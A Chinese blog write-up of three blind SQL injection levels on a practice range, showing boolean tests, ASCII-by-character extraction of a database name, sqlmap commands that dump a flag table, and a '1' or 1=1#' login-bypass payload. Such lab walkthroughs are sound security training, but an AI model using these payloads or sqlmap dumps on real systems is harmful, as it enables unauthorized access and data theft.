封神台 基础靶场 盲注1-3

最新推荐文章于 2023-10-10 16:31:21 发布
最新推荐文章于 2023-10-10 16:31:21 发布
阅读量525 收藏
点赞数
分类专栏: 封神台靶场 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46578840/article/details/118196657
版权

第一关
1 and 1=1 //正常
1 and 1=2 //空,数字型盲注
这里为了节约时间,用bp爆破
1 and length(database())=12,当前数据库长度为12

在这里插入图片描述

1+and+ascii(substr(database(),1,1))+=107  //第一位为k
1+and+ascii(substr(database(),2,1))+=97   //第二位为a
1+and+ascii(substr(database(),3,1))+=110  //第二位为n
1+and+ascii(substr(database(),4,1))+=119   //第四位w
1+and+ascii(substr(database(),5,1))+=111	o
1+and+ascii(substr(database(),6,1))+=108	l
1+and+ascii(substr(database(),7,1))+=111	o
1+and+ascii(substr(database(),8,1))+=110 	n
1+and+ascii(substr(database(),9,1))+=103	g
1+and+ascii(substr(database(),10,1))+=120	x
1+and+ascii(substr(database(),11,1))+=105	i
1+and+ascii(substr(database(),12,1))+=97	a//得到数据库名kanwolongxia

到这里就用sqlmap了,不在手工了,要劳逸结合嘛,手工太累了
python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 -p id --threads 50 -D kanwolongxia --table在这里插入图片描述可以看到得出了三个表,继续爆字段
python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 -p id --threads 50 -D kanwolongxia -T loflag --columns
在这里插入图片描述
爆字段的值
python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 -p id --threads 50 -D kanwolongxia -T loflag -C flaglo --dump
在这里插入图片描述
第二关
跟上面的一样,把单引号换成双引号即可
sqlmap也一样
第三关
1’ or 1=1# //万能密码即可

星星明亮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
神台靶场 | 布尔盲注 | Pass05-07
Fanny0602的博客
03-12 1544
神台靶场 | 布尔盲注 题目地址: 掌控安全学院SQL注入靶场 文章目录       Pass05          盲注          盲注查询步骤       Pass06       Pass07 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 盲注: 1.查询到的数据只会显示有数据/没有结果 2.可以用ASCII进行猜测 盲注查询步骤: 1.数据库名字长度 2.数据库库名 3.
神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1609
1
web靶场搭建
2301_76329510的博客
03-28 726
安全靶场,即模拟的、用于练习的、已发现、漏洞的攻击对象。未经他人允许,对别人计算机攻击,容易进局子喝茶,前提是被发现。
神台基础靶场 显错注入1-4
weixin_46578840的博客
06-24 285
第一题,单双引号没区别,可能不是字符型 1 and 1=1 //页面正常 1 and 1=2 //页面错误,数字型注入 判断列数 1 and 1=1 order by 1,2,3 //回显,存在三列。 判断回显位 1 and 1=2 union select 1,2,3 //23为回显位 注出当前数据库 1 and 1=2 union select 1,2,(database()) --+ 注表 1 and 1=2 union select 1,2,group_concat(table_name) fro
mbp 神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
CTF神台第三关通关
weixin_49071539的博客
11-25 985
分析代码 ① 从请求头中拿到Referer,并赋值给ComeUrl。 ② 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ③ ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 步骤: 1.第二章admin是假后台 2.通过御剑扫描发现还存在一个admin123后台 3.利用第二章的密码可以进入后台 4.打开burp suite,后台点击左侧任意选项 5.查看 burp su
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神演义--------------------.pdf
03-27
1. 《神演义》的历史背景 - 作品以中国古代历史中的商末周初作为故事发生的时期,具体是商纣王统治时期和周武王推翻商朝建立周朝的这段历史。 - 商纣王是历史上有名的暴君,而周武王则是儒家推崇的明君代表。...
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
更改支付金额(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
神榜Feng.Shen.Bang.Fu.Mo.San.Tai.Zi
09-08
很好玩的nes游戏,很经典!是玩nes游戏必玩的一款游戏!
神pak工具操作易语言源码-易语言
06-13
1. 易语言基础:包括易语言的基本语法、控制结构(如循环、条件语句)、函数调用、变量声明等。 2. 文件操作:了解如何在易语言中读取、写入、打开和关闭文件,以及处理二进制文件(如pak文件)的技巧。 3. 数据包...
ctf实战 掌控安全的靶场 第三关通关记录
wh1te 小白的博客
09-20 3435
掌控安全神台第三关  根据题目可能要用burp进行抓包,点击传送门进入题目主页 之前题目说的扫描到新的后台地址admin123 在网址后加入admin123 进入新的后台管理页面 根据第二关得到的用户和密码进行登录  进入后得到这样一个页面 抓包结果如下 根据代码分析只需要修改host和referer的ip地址 修改以后结果还是进不去 分析一下问题  打开F...
mbp 神台靶场 三 (笔记)
qq_43558415的博客
02-09 1037
打开链接,根据提示进行操作由上可知后台登陆地址为admin123,需要准备的工具是大名鼎鼎的burp(抓包软件)
神台——训练营0基础学渗透测试
sparename的博客
08-06 379
盲注-没有回显情况下SQLSQL盲注——靶场ASQL盲注——靶场A三级目录 SQL盲注——靶场A 1.判断数据库长度:and length(database())>4 12 2 .数据库名称:and substr(database(),1,1)='k ’ ascii(substr(database() ),1,1))>107 用burp进行爆破:开服务器,用本机的私网,注意变量的添加 107 97 110 119 111 108 111 110 103 120 105 97 kanwolongx
神台靶场writeup
weixin_44155363的博客
06-06 6811
神台靶场 https://hack.zkaq.cn/battle 还是很有意思的一个靶场 查看源码,找到了字典文件; 用域名爆破工具,放入字典后爆破;答案为:http://8adc3387c2ed6cce.lab.aqlab.cn:81 aqlab.cn 一级域名 lab为二级域名 kali01就是三级域名; https://site.ip138.com/ 这个网站能通过同ip网站能直接查处结果; shop.aqlab.cn:8001 nmap完全扫描可发现,快速扫描无法发现; n
神台靶场跑不了爆破,临时解决办法(亲测有效)
hackzkaq的博客
04-19 3466
最近很多15期的同学都在反馈,靶场跑不了爆破 本人也实测靶场的防护是短时间内ban掉访问频率过快的ip 同样在实战用也会遇到这样的问题,我们不能改变环境的情况下,我们就去适应环境 那么绕过防护的方法目前能实现的就只有两个 1、降低访问频率 2、每次访问使用不同的ip 这两种方法我都帮同学们去实践了,你们按照我测出来的方法直接用就好 第一种,降低访问频率 这种方法目前只在靶场有效,实战中需要根据目标站点的具体防护进行测试 在burp跑爆破的时候,我们需要设置线程数 靶场我在经历过无数次被ban以后,测试出
神台(尤里的复仇),信息收集1--靶场练习,纯手工注入
久恙502的博客
10-10 597
尤里的复仇,做过一遍重新复现一次,练习渗透测试
写一篇《龙族三》的梗概
03-31
《龙族三》是一部由江南创作的奇幻小说,讲述了龙族与人类之间的战争与和平,以及爱情、友情、家族等人性情感的故事。 故事的主角是龙族的公主萧瑟和人类少年谭晓彤。萧瑟和谭晓彤的爱情经历了种种波折,但他们最终克服了种族与身份的障碍,走到了一起。 在这个世界上,龙族和人类之间的关系并不总是和谐的。在第一部小说中,龙族和人类爆发了一场战争,最终以龙族的胜利而告终。但在第二部小说中,龙族和人类达成了和平协议,两个种族开始互相交流和合作,共同发展。 在第三部小说中,萧瑟和谭晓彤的爱情再次面临考验。一位名叫神的神秘人物出现了,他试图煽动龙族与人类之间的矛盾,挑起新一轮的战争。萧瑟和谭晓彤必须联合起来,阻止神的阴谋,为两个种族之间的和平和发展而努力。 在解决神的阴谋之后,萧瑟和谭晓彤终于走到了一起,他们的爱情得到了最终的确认。两个种族之间的和平和合作也得到了进一步的巩固和发展。 《龙族三》是一部充满想象力和感人故事的小说,它让我们重新认识到了人类与自然之间的关系,以及和平与合作的重要性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值